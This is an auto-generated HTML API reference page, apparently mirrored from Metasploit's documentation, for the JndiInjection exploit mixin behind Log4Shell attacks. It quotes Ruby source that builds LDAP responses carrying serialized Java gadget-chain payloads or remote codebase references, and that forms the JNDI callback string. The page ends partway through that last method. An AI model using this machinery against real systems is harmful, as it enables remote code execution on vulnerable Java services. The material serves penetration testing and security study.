adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c3f5bd3de2d1affa01e2f6c2066c6bb0fc6413bc
metasploit-gs/api/Msf/Exploit/Remote/JndiInjection.html
T
jenkins-metasploit c3f5bd3de2 Reboot gh-pages
2026-05-08 17:08:43 +00:00

1003 lines
49 KiB
HTML
Raw Blame History

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>
Module: Msf::Exploit::Remote::JndiInjection
&mdash; Documentation by YARD 0.9.37
</title>
<link rel="stylesheet" href="../../../css/style.css" type="text/css" />
<link rel="stylesheet" href="../../../css/common.css" type="text/css" />
<script type="text/javascript">
pathId = "Msf::Exploit::Remote::JndiInjection";
relpath = '../../../';
</script>
<script type="text/javascript" charset="utf-8" src="../../../js/jquery.js"></script>
<script type="text/javascript" charset="utf-8" src="../../../js/app.js"></script>
</head>
<body>
<div class="nav_wrap">
<iframe id="nav" src="../../../class_list.html?1"></iframe>
<div id="resizer"></div>
</div>
<div id="main" tabindex="-1">
<div id="header">
<div id="menu">
<a href="../../../_index.html">Index (J)</a> &raquo;
<span class='title'><span class='object_link'><a href="../../../Msf.html" title="Msf (module)">Msf</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span> &raquo; <span class='title'><span class='object_link'><a href="../Remote.html" title="Msf::Exploit::Remote (class)">Remote</a></span></span>
&raquo;
<span class="title">JndiInjection</span>
</div>
<div id="search">
<a class="full_list_link" id="class_list_link"
href="../../../class_list.html">
<svg width="24" height="24">
<rect x="0" y="4" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="12" width="24" height="4" rx="1" ry="1"></rect>
<rect x="0" y="20" width="24" height="4" rx="1" ry="1"></rect>
</svg>
</a>
</div>
<div class="clear"></div>
</div>
<div id="content"><h1>Module: Msf::Exploit::Remote::JndiInjection
</h1>
<div class="box_info">
<dl>
<dt>Includes:</dt>
<dd><span class='object_link'><a href="../Java.html" title="Msf::Exploit::Java (module)">Java</a></span>, <span class='object_link'><a href="../JavaDeserialization.html" title="Msf::Exploit::JavaDeserialization (module)">JavaDeserialization</a></span>, <span class='object_link'><a href="LDAP/Server.html" title="Msf::Exploit::Remote::LDAP::Server (module)">LDAP::Server</a></span></dd>
</dl>
<dl>
<dt>Included in:</dt>
<dd><span class='object_link'><a href="Log4Shell.html" title="Msf::Exploit::Remote::Log4Shell (module)">Log4Shell</a></span></dd>
</dl>
<dl>
<dt>Defined in:</dt>
<dd>lib/msf/core/exploit/remote/jndi_injection.rb</dd>
</dl>
</div>
<h2>Instance Attribute Summary</h2>
<h3 class="inherited">Attributes included from <span class='object_link'><a href="LDAP/Server.html" title="Msf::Exploit::Remote::LDAP::Server (module)">LDAP::Server</a></span></h3>
<p class="inherited"><span class='object_link'><a href="LDAP/Server.html#service-instance_method" title="Msf::Exploit::Remote::LDAP::Server#service (method)">#service</a></span></p>
<h3 class="inherited">Attributes included from <span class='object_link'><a href="SocketServer.html" title="Msf::Exploit::Remote::SocketServer (module)">SocketServer</a></span></h3>
<p class="inherited"><span class='object_link'><a href="SocketServer.html#service-instance_method" title="Msf::Exploit::Remote::SocketServer#service (method)">#service</a></span></p>
<h2>
Instance Method Summary
<small><a href="#" class="summary_toggle">collapse</a></small>
</h2>
<ul class="summary">
<li class="public ">
<span class="summary_signature">
<a href="#build_ldap_search_response-instance_method" title="#build_ldap_search_response (instance method)">#<strong>build_ldap_search_response</strong>(msg_id, base_dn) &#x21d2; Array </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Generate and serialize the payload as an LDAP search response.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#build_ldap_search_response_payload-instance_method" title="#build_ldap_search_response_payload (instance method)">#<strong>build_ldap_search_response_payload</strong> &#x21d2; Array </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Build the LDAP response to the search request that contains the serialized payload.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#build_ldap_search_response_payload_inline-instance_method" title="#build_ldap_search_response_payload_inline (instance method)">#<strong>build_ldap_search_response_payload_inline</strong>(gadget_chain) &#x21d2; Array </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Build the LDAP response to the search request that contains the serialized payload to be executed.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#build_ldap_search_response_payload_remote-instance_method" title="#build_ldap_search_response_payload_remote (instance method)">#<strong>build_ldap_search_response_payload_remote</strong>(pay_url, pay_class = &#39;metasploit.PayloadFactory&#39;) &#x21d2; Array </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Build the LDAP response to the search request that contains a reference to an HTTP server from which a remote class will be loaded.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#initialize-instance_method" title="#initialize (instance method)">#<strong>initialize</strong>(info = {}) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#jndi_string-instance_method" title="#jndi_string (instance method)">#<strong>jndi_string</strong>(resource = nil) &#x21d2; String </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>Create the JNDI injection string that will trigger an LDAP connection back to Metasploit.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#on_dispatch_request-instance_method" title="#on_dispatch_request (instance method)">#<strong>on_dispatch_request</strong>(client, data) &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'>
<p>LDAP service callbacks.</p>
</div></span>
</li>
<li class="public ">
<span class="summary_signature">
<a href="#validate_configuration!-instance_method" title="#validate_configuration! (instance method)">#<strong>validate_configuration!</strong> &#x21d2; Object </a>
</span>
<span class="summary_desc"><div class='inline'></div></span>
</li>
</ul>
<h3 class="inherited">Methods included from <span class='object_link'><a href="LDAP/Server.html" title="Msf::Exploit::Remote::LDAP::Server (module)">LDAP::Server</a></span></h3>
<p class="inherited"><span class='object_link'><a href="LDAP/Server.html#on_send_response-instance_method" title="Msf::Exploit::Remote::LDAP::Server#on_send_response (method)">#on_send_response</a></span>, <span class='object_link'><a href="LDAP/Server.html#read_ldif-instance_method" title="Msf::Exploit::Remote::LDAP::Server#read_ldif (method)">#read_ldif</a></span>, <span class='object_link'><a href="LDAP/Server.html#start_service-instance_method" title="Msf::Exploit::Remote::LDAP::Server#start_service (method)">#start_service</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="SocketServer.html" title="Msf::Exploit::Remote::SocketServer (module)">SocketServer</a></span></h3>
<p class="inherited"><span class='object_link'><a href="SocketServer.html#_determine_server_comm-instance_method" title="Msf::Exploit::Remote::SocketServer#_determine_server_comm (method)">#_determine_server_comm</a></span>, <span class='object_link'><a href="SocketServer.html#bindhost-instance_method" title="Msf::Exploit::Remote::SocketServer#bindhost (method)">#bindhost</a></span>, <span class='object_link'><a href="SocketServer.html#bindport-instance_method" title="Msf::Exploit::Remote::SocketServer#bindport (method)">#bindport</a></span>, <span class='object_link'><a href="SocketServer.html#cleanup-instance_method" title="Msf::Exploit::Remote::SocketServer#cleanup (method)">#cleanup</a></span>, <span class='object_link'><a href="SocketServer.html#cleanup_service-instance_method" title="Msf::Exploit::Remote::SocketServer#cleanup_service (method)">#cleanup_service</a></span>, <span class='object_link'><a href="SocketServer.html#exploit-instance_method" title="Msf::Exploit::Remote::SocketServer#exploit (method)">#exploit</a></span>, <span class='object_link'><a href="SocketServer.html#on_client_data-instance_method" title="Msf::Exploit::Remote::SocketServer#on_client_data (method)">#on_client_data</a></span>, <span class='object_link'><a href="SocketServer.html#primer-instance_method" title="Msf::Exploit::Remote::SocketServer#primer (method)">#primer</a></span>, <span class='object_link'><a href="SocketServer.html#regenerate_payload-instance_method" title="Msf::Exploit::Remote::SocketServer#regenerate_payload (method)">#regenerate_payload</a></span>, <span class='object_link'><a href="SocketServer.html#srvhost-instance_method" title="Msf::Exploit::Remote::SocketServer#srvhost (method)">#srvhost</a></span>, <span class='object_link'><a href="SocketServer.html#srvhost_addr-instance_method" title="Msf::Exploit::Remote::SocketServer#srvhost_addr (method)">#srvhost_addr</a></span>, <span class='object_link'><a href="SocketServer.html#srvport-instance_method" title="Msf::Exploit::Remote::SocketServer#srvport (method)">#srvport</a></span>, <span class='object_link'><a href="SocketServer.html#start_service-instance_method" title="Msf::Exploit::Remote::SocketServer#start_service (method)">#start_service</a></span>, <span class='object_link'><a href="SocketServer.html#via_string-instance_method" title="Msf::Exploit::Remote::SocketServer#via_string (method)">#via_string</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../JavaDeserialization.html" title="Msf::Exploit::JavaDeserialization (module)">JavaDeserialization</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../JavaDeserialization.html#gadget_chains-class_method" title="Msf::Exploit::JavaDeserialization.gadget_chains (method)">gadget_chains</a></span>, <span class='object_link'><a href="../JavaDeserialization.html#generate_java_deserialization_for_command-instance_method" title="Msf::Exploit::JavaDeserialization#generate_java_deserialization_for_command (method)">#generate_java_deserialization_for_command</a></span>, <span class='object_link'><a href="../JavaDeserialization.html#generate_java_deserialization_for_payload-instance_method" title="Msf::Exploit::JavaDeserialization#generate_java_deserialization_for_payload (method)">#generate_java_deserialization_for_payload</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../Powershell.html" title="Msf::Exploit::Powershell (module)">Powershell</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../Powershell.html#bypass_powershell_protections-instance_method" title="Msf::Exploit::Powershell#bypass_powershell_protections (method)">#bypass_powershell_protections</a></span>, <span class='object_link'><a href="../Powershell.html#cmd_psh_payload-instance_method" title="Msf::Exploit::Powershell#cmd_psh_payload (method)">#cmd_psh_payload</a></span>, <span class='object_link'><a href="../Powershell.html#compress_script-instance_method" title="Msf::Exploit::Powershell#compress_script (method)">#compress_script</a></span>, <span class='object_link'><a href="../Powershell.html#decode_script-instance_method" title="Msf::Exploit::Powershell#decode_script (method)">#decode_script</a></span>, <span class='object_link'><a href="../Powershell.html#decompress_script-instance_method" title="Msf::Exploit::Powershell#decompress_script (method)">#decompress_script</a></span>, <span class='object_link'><a href="../Powershell.html#encode_script-instance_method" title="Msf::Exploit::Powershell#encode_script (method)">#encode_script</a></span>, <span class='object_link'><a href="../Powershell.html#generate_psh_args-instance_method" title="Msf::Exploit::Powershell#generate_psh_args (method)">#generate_psh_args</a></span>, <span class='object_link'><a href="../Powershell.html#generate_psh_command_line-instance_method" title="Msf::Exploit::Powershell#generate_psh_command_line (method)">#generate_psh_command_line</a></span>, <span class='object_link'><a href="../Powershell.html#make_subs-instance_method" title="Msf::Exploit::Powershell#make_subs (method)">#make_subs</a></span>, <span class='object_link'><a href="../Powershell.html#process_subs-instance_method" title="Msf::Exploit::Powershell#process_subs (method)">#process_subs</a></span>, <span class='object_link'><a href="../Powershell.html#read_script-instance_method" title="Msf::Exploit::Powershell#read_script (method)">#read_script</a></span>, <span class='object_link'><a href="../Powershell.html#run_hidden_psh-instance_method" title="Msf::Exploit::Powershell#run_hidden_psh (method)">#run_hidden_psh</a></span></p>
<h3 class="inherited">Methods included from <span class='object_link'><a href="../Java.html" title="Msf::Exploit::Java (module)">Java</a></span></h3>
<p class="inherited"><span class='object_link'><a href="../Java.html#build_jar-instance_method" title="Msf::Exploit::Java#build_jar (method)">#build_jar</a></span>, <span class='object_link'><a href="../Java.html#compile-instance_method" title="Msf::Exploit::Java#compile (method)">#compile</a></span>, <span class='object_link'><a href="../Java.html#init_jvm-instance_method" title="Msf::Exploit::Java#init_jvm (method)">#init_jvm</a></span>, <span class='object_link'><a href="../Java.html#query_jvm-instance_method" title="Msf::Exploit::Java#query_jvm (method)">#query_jvm</a></span>, <span class='object_link'><a href="../Java.html#save_to_file-instance_method" title="Msf::Exploit::Java#save_to_file (method)">#save_to_file</a></span>, <span class='object_link'><a href="../Java.html#serialized_class_from_jar-instance_method" title="Msf::Exploit::Java#serialized_class_from_jar (method)">#serialized_class_from_jar</a></span>, <span class='object_link'><a href="../Java.html#sign_jar-instance_method" title="Msf::Exploit::Java#sign_jar (method)">#sign_jar</a></span></p>
<div id="instance_method_details" class="method_details_list">
<h2>Instance Method Details</h2>
<div class="method_details first">
<h3 class="signature first" id="build_ldap_search_response-instance_method">
#<strong>build_ldap_search_response</strong>(msg_id, base_dn) &#x21d2; <tt>Array</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Generate and serialize the payload as an LDAP search response</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>msg_id</span>
<span class='type'>(<tt>Integer</tt>)</span>
&mdash;
<div class='inline'>
<p>LDAP message identifier</p>
</div>
</li>
<li>
<span class='name'>base_dn</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>LDAP distinguished name</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Array</tt>)</span>
&mdash;
<div class='inline'>
<p>packed BER sequence</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
92
93
94
95
96
97
98
99</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/jndi_injection.rb', line 92</span>
<span class='kw'>def</span> <span class='id identifier rubyid_build_ldap_search_response'>build_ldap_search_response</span><span class='lparen'>(</span><span class='id identifier rubyid_msg_id'>msg_id</span><span class='comma'>,</span> <span class='id identifier rubyid_base_dn'>base_dn</span><span class='rparen'>)</span>
<span class='id identifier rubyid_attrs'>attrs</span> <span class='op'>=</span> <span class='id identifier rubyid_build_ldap_search_response_payload'>build_ldap_search_response_payload</span>
<span class='id identifier rubyid_appseq'>appseq</span> <span class='op'>=</span> <span class='lbracket'>[</span>
<span class='id identifier rubyid_base_dn'>base_dn</span><span class='period'>.</span><span class='id identifier rubyid_to_ber'>to_ber</span><span class='comma'>,</span>
<span class='id identifier rubyid_attrs'>attrs</span><span class='period'>.</span><span class='id identifier rubyid_to_ber_sequence'>to_ber_sequence</span>
<span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_to_ber_appsequence'>to_ber_appsequence</span><span class='lparen'>(</span><span class='const'>Net</span><span class='op'>::</span><span class='const'>LDAP</span><span class='op'>::</span><span class='const'>PDU</span><span class='op'>::</span><span class='const'>SearchReturnedData</span><span class='rparen'>)</span>
<span class='lbracket'>[</span> <span class='id identifier rubyid_msg_id'>msg_id</span><span class='period'>.</span><span class='id identifier rubyid_to_ber'>to_ber</span><span class='comma'>,</span> <span class='id identifier rubyid_appseq'>appseq</span> <span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_to_ber_sequence'>to_ber_sequence</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="build_ldap_search_response_payload-instance_method">
#<strong>build_ldap_search_response_payload</strong> &#x21d2; <tt>Array</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Build the LDAP response to the search request that contains the serialized payload.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Array</tt>)</span>
&mdash;
<div class='inline'>
<p>the array of attributes to add to the returned search data of the query response.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
105
106
107
108
109</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/jndi_injection.rb', line 105</span>
<span class='kw'>def</span> <span class='id identifier rubyid_build_ldap_search_response_payload'>build_ldap_search_response_payload</span>
<span class='comment'># exploit authors should override this and either call the inline one with a gadget chain that is compatible with
</span> <span class='comment'># the target or setup an HTTP server and call the remote one
</span> <span class='id identifier rubyid_build_ldap_search_response_payload_inline'>build_ldap_search_response_payload_inline</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>BeanFactory</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="build_ldap_search_response_payload_inline-instance_method">
#<strong>build_ldap_search_response_payload_inline</strong>(gadget_chain) &#x21d2; <tt>Array</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Build the LDAP response to the search request that contains the serialized payload to be executed.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>gadget_chain</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The gadget chain to use to execute the payload. This value must be compatible with the target application.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Array</tt>)</span>
&mdash;
<div class='inline'>
<p>the array of attributes to add to the returned search data of the query response.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
117
118
119
120
121
122
123</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/jndi_injection.rb', line 117</span>
<span class='kw'>def</span> <span class='id identifier rubyid_build_ldap_search_response_payload_inline'>build_ldap_search_response_payload_inline</span><span class='lparen'>(</span><span class='id identifier rubyid_gadget_chain'>gadget_chain</span><span class='rparen'>)</span>
<span class='id identifier rubyid_java_payload'>java_payload</span> <span class='op'>=</span> <span class='id identifier rubyid_generate_java_deserialization_for_payload'>generate_java_deserialization_for_payload</span><span class='lparen'>(</span><span class='id identifier rubyid_gadget_chain'>gadget_chain</span><span class='comma'>,</span> <span class='id identifier rubyid_payload'>payload</span><span class='rparen'>)</span>
<span class='lbracket'>[</span>
<span class='lbracket'>[</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>javaClassName</span><span class='tstring_end'>&#39;</span></span><span class='period'>.</span><span class='id identifier rubyid_to_ber'>to_ber</span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='id identifier rubyid_rand_text_alphanumeric'>rand_text_alphanumeric</span><span class='lparen'>(</span><span class='int'>8</span><span class='op'>..</span><span class='int'>15</span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_to_ber'>to_ber</span> <span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_to_ber_set'>to_ber_set</span> <span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_to_ber_sequence'>to_ber_sequence</span><span class='comma'>,</span>
<span class='lbracket'>[</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>javaSerializedData</span><span class='tstring_end'>&#39;</span></span><span class='period'>.</span><span class='id identifier rubyid_to_ber'>to_ber</span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='id identifier rubyid_java_payload'>java_payload</span><span class='period'>.</span><span class='id identifier rubyid_to_ber'>to_ber</span> <span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_to_ber_set'>to_ber_set</span> <span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_to_ber_sequence'>to_ber_sequence</span>
<span class='rbracket'>]</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="build_ldap_search_response_payload_remote-instance_method">
#<strong>build_ldap_search_response_payload_remote</strong>(pay_url, pay_class = &#39;metasploit.PayloadFactory&#39;) &#x21d2; <tt>Array</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Build the LDAP response to the search request that contains a reference to an HTTP server from which a remote class will be loaded. The target must have the trusted code base option enabled for this technique to work. The HTTP server from which the class is hosted is not managed by this method.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Parameters:</p>
<ul class="param">
<li>
<span class='name'>pay_url</span>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>The URL from which the class should be loaded.</p>
</div>
</li>
<li>
<span class='name'>pay_class</span>
<span class='type'>(<tt>String</tt>)</span>
<em class="default">(defaults to: <tt>&#39;metasploit.PayloadFactory&#39;</tt>)</em>
&mdash;
<div class='inline'>
<p>The payload class name.</p>
</div>
</li>
</ul>
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>Array</tt>)</span>
&mdash;
<div class='inline'>
<p>the array of attributes to add to the returned search data of the query response.</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
133
134
135
136
137
138
139
140</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/jndi_injection.rb', line 133</span>
<span class='kw'>def</span> <span class='id identifier rubyid_build_ldap_search_response_payload_remote'>build_ldap_search_response_payload_remote</span><span class='lparen'>(</span><span class='id identifier rubyid_pay_url'>pay_url</span><span class='comma'>,</span> <span class='id identifier rubyid_pay_class'>pay_class</span> <span class='op'>=</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>metasploit.PayloadFactory</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span>
<span class='lbracket'>[</span>
<span class='lbracket'>[</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>javaClassName</span><span class='tstring_end'>&#39;</span></span><span class='period'>.</span><span class='id identifier rubyid_to_ber'>to_ber</span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='id identifier rubyid_pay_class'>pay_class</span><span class='period'>.</span><span class='id identifier rubyid_to_ber'>to_ber</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_to_ber_set'>to_ber_set</span> <span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_to_ber_sequence'>to_ber_sequence</span><span class='comma'>,</span>
<span class='lbracket'>[</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>javaFactory</span><span class='tstring_end'>&#39;</span></span><span class='period'>.</span><span class='id identifier rubyid_to_ber'>to_ber</span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='id identifier rubyid_pay_class'>pay_class</span><span class='period'>.</span><span class='id identifier rubyid_to_ber'>to_ber</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_to_ber_set'>to_ber_set</span> <span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_to_ber_sequence'>to_ber_sequence</span><span class='comma'>,</span>
<span class='lbracket'>[</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>objectClass</span><span class='tstring_end'>&#39;</span></span><span class='period'>.</span><span class='id identifier rubyid_to_ber'>to_ber</span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>javaNamingReference</span><span class='tstring_end'>&#39;</span></span><span class='period'>.</span><span class='id identifier rubyid_to_ber'>to_ber</span> <span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_to_ber_set'>to_ber_set</span> <span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_to_ber_sequence'>to_ber_sequence</span><span class='comma'>,</span>
<span class='lbracket'>[</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>javaCodebase</span><span class='tstring_end'>&#39;</span></span><span class='period'>.</span><span class='id identifier rubyid_to_ber'>to_ber</span><span class='comma'>,</span> <span class='lbracket'>[</span> <span class='id identifier rubyid_pay_url'>pay_url</span><span class='period'>.</span><span class='id identifier rubyid_to_ber'>to_ber</span> <span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_to_ber_set'>to_ber_set</span> <span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_to_ber_sequence'>to_ber_sequence</span><span class='comma'>,</span>
<span class='rbracket'>]</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="initialize-instance_method">
#<strong>initialize</strong>(info = {}) &#x21d2; <tt>Object</tt>
</h3><table class="source_code">
<tr>
<td>
<pre class="lines">
18
19
20
21
22
23
24
25
26
27
28
29
30
31</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/jndi_injection.rb', line 18</span>
<span class='kw'>def</span> <span class='id identifier rubyid_initialize'>initialize</span><span class='lparen'>(</span><span class='id identifier rubyid_info'>info</span> <span class='op'>=</span> <span class='lbrace'>{</span><span class='rbrace'>}</span><span class='rparen'>)</span>
<span class='kw'>super</span><span class='lparen'>(</span><span class='id identifier rubyid_update_info'>update_info</span><span class='lparen'>(</span><span class='id identifier rubyid_info'>info</span><span class='comma'>,</span>
<span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Stance</span><span class='tstring_end'>&#39;</span></span> <span class='op'>=&gt;</span> <span class='const'><span class='object_link'><a href="../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../Exploit.html" title="Msf::Exploit (class)">Exploit</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../Stance.html" title="Msf::Exploit::Stance (module)">Stance</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../Stance.html#Aggressive-constant" title="Msf::Exploit::Stance::Aggressive (constant)">Aggressive</a></span></span><span class='rparen'>)</span><span class='rparen'>)</span>
<span class='id identifier rubyid_register_options'>register_options</span><span class='lparen'>(</span>
<span class='lbracket'>[</span>
<span class='const'><span class='object_link'><a href="../../OptAddressRoutable.html" title="Msf::OptAddressRoutable (class)">OptAddressRoutable</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptBase.html#initialize-instance_method" title="Msf::OptBase#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SRVHOST</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span><span class='kw'>false</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>The local host to listen on and use for incoming connections</span><span class='tstring_end'>&#39;</span></span><span class='rbracket'>]</span><span class='rparen'>)</span><span class='comma'>,</span>
<span class='rbracket'>]</span>
<span class='rparen'>)</span>
<span class='id identifier rubyid_register_advanced_options'>register_advanced_options</span><span class='lparen'>(</span><span class='lbracket'>[</span>
<span class='const'><span class='object_link'><a href="../../OptBool.html" title="Msf::OptBool (class)">OptBool</a></span></span><span class='period'>.</span><span class='id identifier rubyid_new'><span class='object_link'><a href="../../OptBool.html#initialize-instance_method" title="Msf::OptBool#initialize (method)">new</a></span></span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>LDAP_AUTH_BYPASS</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='lbracket'>[</span><span class='kw'>true</span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>Ignore LDAP client authentication</span><span class='tstring_end'>&#39;</span></span><span class='comma'>,</span> <span class='kw'>true</span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="jndi_string-instance_method">
#<strong>jndi_string</strong>(resource = nil) &#x21d2; <tt>String</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Create the JNDI injection string that will trigger an LDAP connection back to Metasploit.</p>
</div>
</div>
<div class="tags">
<p class="tag_title">Returns:</p>
<ul class="return">
<li>
<span class='type'>(<tt>String</tt>)</span>
&mdash;
<div class='inline'>
<p>the JNDI string</p>
</div>
</li>
</ul>
</div><table class="source_code">
<tr>
<td>
<pre class="lines">
36
37
38
39</pre>
</td>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/jndi_injection.rb', line 36</span>
<span class='kw'>def</span> <span class='id identifier rubyid_jndi_string'>jndi_string</span><span class='lparen'>(</span><span class='id identifier rubyid_resource'>resource</span> <span class='op'>=</span> <span class='kw'>nil</span><span class='rparen'>)</span>
<span class='id identifier rubyid_resource'>resource</span> <span class='op'>||=</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>dc=</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha_lower'>rand_text_alpha_lower</span><span class='lparen'>(</span><span class='int'>6</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_content'>,dc=</span><span class='embexpr_beg'>#{</span><span class='const'><span class='object_link'><a href="../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'>Text</span><span class='period'>.</span><span class='id identifier rubyid_rand_text_alpha_lower'>rand_text_alpha_lower</span><span class='lparen'>(</span><span class='int'>3</span><span class='rparen'>)</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span>
